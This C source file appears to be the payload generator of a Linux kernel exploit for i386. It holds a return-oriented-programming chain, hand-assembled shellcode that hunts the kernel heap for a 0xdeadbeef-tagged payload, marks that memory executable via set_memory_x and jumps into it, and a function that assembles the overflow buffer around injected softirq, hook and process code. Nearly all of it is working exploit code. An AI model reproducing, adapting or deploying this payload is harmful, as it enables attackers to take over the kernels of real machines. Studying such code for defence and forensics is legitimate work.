#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/string.h>
#include <asm/system.h>
#include <linux/mm.h>
#include "payload.h"
#ifdef PAE
/* Two alternative stubs, selected at build time by PAE.  Each entry is
 * either one of the constants pulled in from payload.h
 * (PUSH_ESP_POP_EAX, ALIGN_EAX, RET, POP_EDX, SET_MEMORY_X, JMP_ESP --
 * presumably word/address constants; they are not defined on this page)
 * or a literal word.  generate_payload() copies the whole array verbatim
 * with sizeof(rop_stub), so the element order here is the order the
 * words occupy in the buffer.  The element type is unsigned long, i.e.
 * 4-byte words on the i386 target the mnemonics in copy_stub imply.
 * The bracketed numbers in the author's comments are kept as found;
 * their meaning is not stated here. */
static unsigned long rop_stub[] = {
/*1*/ PUSH_ESP_POP_EAX,
/*4*/ 0xffffffff,
0xffffffff,
/*3*/ 0xffffffff,
ALIGN_EAX,
/*2*/ 0xffffffff,
0xffffffff,
/*1*/ RET,
/*4*/ POP_EDX,
0x00000004,
/*3*/ 0xffffffff,
0xffffffff,
/*2*/ 0xffffffff,
0xffffffff,
/*1*/ RET,
/*4*/ SET_MEMORY_X,
JMP_ESP,
};
#else
/* Non-PAE variant: three words only. */
static unsigned long rop_stub[] = {
/*1*/ RET,
/*4*/ RET,
JMP_ESP,
}
#endif
/* Needs to be coded by hand because of the
 * 7-byte constraint */
/* Hand-assembled i386 machine code kept as a byte string; the mnemonic
 * comment beside each fragment is the author's disassembly of that
 * fragment.  The string carries a NUL terminator that
 * generate_payload() drops with sizeof(copy_stub)-1, and it is copied
 * into the buffer directly after rop_stub.  The bracketed numbers in
 * the author's comments are kept as found; their meaning is not stated
 * here. */
static char copy_stub[] = "\x90"
/* Find our payload on the kernel heap, using
 * the tag 0xdeadbeef. We do this because
 * we don't have enough room in the overflowed
 * buffer to fit a payload with all the bells
 * and whistles we want. */
/*2*/ "\x89\xe0" /* mov eax,esp */
"\x83\xc0\x80" /* add eax,0x80 */
/* search: */
"\x83\xc0\x04" /* add eax,0x4 */
/*1*/ "\x8b\x30" /* mov esi,DWORD PTR [eax] */
/*6*/ "\x81\xfe\xf0\xf0\xf0\xdf" /* cmp esi,0xdff0f0f0 */
"\x77\xf3" /* jg search */
/*5*/ "\x81\xfe\x80\x80\x80\xc8" /* cmp esi,0xc8808080 */
"\x72\xeb" /* jl search */
"\x90"
/*3*/ "\x66\x81\xe6\x00\xf0" /* and si,0xf000 */
"\x90\x90\x90"
/*2*/ "\xb9\x80\x20\x00\x00" /* mov ecx,0x2080 */
/* find: */
"\x46" /* inc esi */
/* The tag is expected twice in a row: [esi] and [esi+4].  This
 * doubled word is what generate_payload() writes as HEADER_MAGIC. */
/*3*/ "\x81\x3e\xef\xbe\xad\xde" /* cmp DWORD PTR [esi],0xdeadbeef */
"\x75\x0b" /* jne next */
"\x90"
/*1*/ "\x81\x7e\x04\xef\xbe\xad\xde" /* cmp DWORD PTR [esi+0x4],0xdeadbeef */
/*1*/ "\x90"
"\x74\x04" /* je found */
/* next: */
"\xe2\xea" /* loop find */
"\xeb\xc5" /* jmp search */
/* found: */
#ifdef PAE
/* Mark it executable */
/*1*/ "\x89\xf0"
"\x66\x25\x00\xf0" /* and ax,0xf000 */
/*2*/ "\x90\x90"
"\x2d\x00\x10\x00\x00" /* sub eax,0x1000 */
/*2*/ "\x31\xd2" /* xor edx,edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x42" /* inc edx */
"\x90\x90"
/*1*/ "\xbb" /* mov ebx,&set_memory_x */
SET_MEMORY_X_CHAR /* address bytes, supplied by payload.h */
"\xff\xd3" /* call ebx */
#endif
/*1*/ "\x83\xc6\x08" /* add esi,0x8 */
"\xff\xe6" /* jmp esi */
/* Trailing run of 0x90 bytes -- presumably padding the string out to a
 * fixed overall length; the target length is not stated here. */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90";
/**
 * generate_payload - assemble the staged buffer in one kmalloc'd block.
 * @len: out parameter; receives the buffer's total size in bytes, or 0
 *       when allocation fails.
 *
 * The buffer is written in this fixed order (sizes computed below):
 *   EIP_OFFSET bytes of 0x90 fill,
 *   rop_stub, copied verbatim (sizeof(rop_stub) bytes),
 *   copy_stub without its NUL terminator,
 *   HEADER_MAGIC written twice as two 4-byte words,
 *   the softirq, hook and process regions, copied byte-for-byte from
 *   the extern label pairs declared below.
 * copy_stub scans for a doubled 0xdeadbeef word at [esi] and [esi+4]
 * (see its comments), so HEADER_MAGIC is presumably that value --
 * confirm in payload.h.  The write order is what copy_stub relies on;
 * it must not be reordered.  For forensics, the long 0x90 run followed
 * by the repeated tag word is the distinctive shape of this buffer.
 *
 * Return: the buffer, whose ownership passes to the caller (release
 * with kfree()), or NULL if kmalloc() fails.
 */
unsigned char *generate_payload(int *len)
{
/* Label pairs bracketing three code regions defined in another
 * translation unit (presumably assembly labels; not visible here). */
extern char softirq_start;
extern char softirq_end;
extern char hook_start;
extern char hook_end;
extern char process_start;
extern char process_end;
char *payload, *p;
unsigned int copy_size;
unsigned int softirq_size;
unsigned int hook_size;
unsigned int process_size;
unsigned int total_size;
unsigned int rop_size;
rop_size = sizeof(rop_stub); /* byte size of the whole array, not the element count */
copy_size = sizeof(copy_stub)-1; /* drop the string's NUL terminator */
/* ptrdiff_t narrowed to unsigned int.  Assumes each *_end label is
 * placed after its *_start; a negative difference would wrap to a huge
 * size and the kmalloc() below would fail. */
softirq_size = &softirq_end - &softirq_start;
hook_size = &hook_end - &hook_start;
process_size = &process_end - &process_start;
/* The literal 8 is the two 4-byte HEADER_MAGIC words written below. */
total_size = EIP_OFFSET + rop_size + copy_size + 8 + softirq_size +
hook_size + process_size;
payload = p = kmalloc(total_size, GFP_ATOMIC); /* GFP_ATOMIC: must not sleep */
if (!payload) {
*len = 0;
return NULL;
}
*len = total_size;
memset(p, 0x90, EIP_OFFSET); /* leading fill with the same 0x90 byte copy_stub pads with */
p += EIP_OFFSET;
memcpy(p, rop_stub, rop_size);
p += rop_size;
memcpy(p, copy_stub, copy_size);
p += copy_size;
/* Tag word written twice; copy_stub compares both [esi] and [esi+4].
 * The unaligned 4-byte stores rely on the i386 target tolerating them. */
*(unsigned int *)p = HEADER_MAGIC;
p += 4;
*(unsigned int *)p = HEADER_MAGIC;
p += 4;
memcpy(p, &softirq_start, softirq_size);
p += softirq_size;
memcpy(p, &hook_start, hook_size);
p += hook_size;
memcpy(p, &process_start, process_size);
p += process_size;
return payload;
}